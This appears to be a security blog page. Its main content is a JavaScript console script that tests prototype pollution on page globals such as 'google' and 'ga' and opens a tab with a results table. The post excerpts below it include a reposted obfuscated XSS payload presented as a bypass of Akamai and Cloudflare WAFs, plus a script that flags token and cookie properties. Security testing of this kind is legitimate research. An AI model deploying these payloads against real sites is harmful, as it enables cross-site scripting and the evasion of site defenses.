Global Object Prototype Pollution Report - code in article

 




(() => {
  const ArrayOfInterestingObjects = ['google', 'gapi', 'gadgets', 'ga'];

  // Malicious payload to test prototype pollution

  const maliciousPayload = JSON.parse('{"__proto__": {"polluted": "XSS!"}}');
  const pollutionResults = [];
  ArrayOfInterestingObjects.forEach((key) => {

    const target = window[key];

    if (!target) {

      console.warn(`window.${key} does not exist.`);

      pollutionResults.push({

        key,

        exists: false,

        polluted: false,

        reason: 'Object does not exist',

      });

      return;

    }


    console.log(`Inspecting window.${key}:`, target);


    try {

      Object.assign(target, maliciousPayload);

      const wasPolluted = {}.polluted === 'XSS!';


      pollutionResults.push({

        key,

        exists: true,

        polluted: wasPolluted,

        snapshot: JSON.stringify(target, null, 2),

      });


      console.log(`window.${key} polluted?`, wasPolluted);

    } catch (err) {

      console.error(`Error while attempting to assign to window.${key}:`, err);

      pollutionResults.push({

        key,

        exists: true,

        polluted: false,

        reason: `Error during assign: ${err.message}`,

      });

    }

  });


  // Open results in a new tab

  const win = window.open("", "_blank");

  win.document.write(`

    <html>

      <head>

        <title>Global Object Prototype Pollution Test</title>

        <style>

          body { background: #121212; color: #0ff; font-family: monospace; padding: 20px; }

          table { border-collapse: collapse; width: 100%; }

          th, td { border: 1px solid #0ff; padding: 5px; vertical-align: top; }

          th { background: #1a1a1a; }

          td { white-space: pre-wrap; word-break: break-word; }

        </style>

      </head>

      <body>

        <h1>Global Object Prototype Pollution Report</h1>

        <table>

          <thead>

            <tr>

              <th>Object</th>

              <th>Exists</th>

              <th>Polluted</th>

              <th>Details</th>

            </tr>

          </thead>

          <tbody>

            ${pollutionResults.map(({ key, exists, polluted, reason, snapshot }) => `

              <tr>

                <td>${key}</td>

                <td>${exists ? 'YES' : 'NO'}</td>

                <td>${polluted ? 'YES' : 'NO'}</td>

                <td>${exists ? `<pre>${snapshot || reason || '(no details)'}</pre>` : reason}</td>

              </tr>

            `).join('')}

          </tbody>

        </table>

        <h2>Prototype Check</h2>

        <pre>Object.prototype.polluted: ${JSON.stringify({}.polluted || '(not polluted)')}</pre>

      </body>

    </html>

  `);

  win.document.close();

})();




Comments

Post a Comment

Please feel free to sign up and join the discussion or start one

Popular posts from this blog

Repost from LI - New WAF Bypass Discovered - Akamai & Cloudflare

Image
Just found this on LinkedIn - Props goes to Amit for the post AMIT BHAKAR AMIT BHAKAR   • 2nd Verified • 2nd Cyber Security Researcher || Bug Bounty Hunter || Penetration Tester || Ethical Hacker|| Cyber Security Researcher || Bug Bounty Hunter || Penetration Tester || Ethical Hacker|| 1d • 1 day ago • Visible to anyone on or off LinkedIn Pending You have already invited AMIT BHAKAR Bug Bounty tips 👀 New WAF Bypass Discovered - Akamai & Cloudflare 🔥 Original Post Link: https://www.linkedin.com/feed/update/urn:li:activity:7364263906405441537/ A fresh technique has been spotted that successfully bypasses WAFs like Akamai and Cloudflare. Payload -  <address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address...
Read more

Analyze Object - Attempt prototype pollution - console / inspect .js code

 // Usage examples: // analyzeObject(window.ga, { name: 'ga' }); // analyzeObject(appState, { name: 'appState', maxDepth: 3, tryPollute: true }); (function () { const SUSPICIOUS_NAME_RE = /(csrf|xsrf|token|auth|secret|session|jwt|apikey|api[-_]?key|bearer|cookie|hdr|header)/i; function analyzeObject(target, { name = '(anonymous)', maxDepth = 2, tryPollute = false, // off by default; if true, adds & removes a probe on the prototype showValues = false // keep false to avoid dumping sensitive values to the console } = {}) { if (target == null || (typeof target !== 'object' && typeof target !== 'function')) { console.warn(`[X] Target '${name}' is not an object/function or is null/undefined.`); return; } console.group(`[?] Analyzing '${name}'`); const ownProps = Object.getOwnPropertyNames(target); console.log(`[^] Own properties (${ownProps.length}):`, ownProps); // Classify const types = ownProps.reduce((ac...
Read more

Optimizing the TCP and Kernel of [Ubuntu/kali/Debian]? Here is some optimizations for you (I did not write them / Props to the original author)

# ------------------------------------------------------------------------------------------ Desc: TCPIP Tweaks for Ubuntu / most linux distress Note: This likely will improve your throughput.  I have had no problems with these settings  +    :  #------------------------------------------------------------------------------------------| # INTERFACE SETTINGS # ================== # Please understand these before changing them. # Check out Documentation/networking/ip-sysctl.txt in your kernel source for more details. #---[ FULL CREDIT IS GIVEN TO THE ORIGINAL POSTER ]---# |--------------------------------------------------------------------------------------| #load irc and ftp conntrack helpers if they exist /sbin/modprobe ip_conntrack_irc &>/dev/null /sbin/modprobe ip_conntrack_ftp &>/dev/null #ip fowarding (these must be 1 to be able to forward packets between interfaces!) echo 1 > /proc/sys/net/ipv4/ip_forward echo 1 > /proc/sys/net/ipv4/conf...
Read more